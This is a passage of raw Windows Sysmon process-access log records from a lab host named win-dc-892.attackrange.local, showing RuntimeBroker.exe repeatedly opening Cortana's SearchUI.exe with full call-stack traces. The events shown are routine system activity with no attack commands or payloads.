SER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Int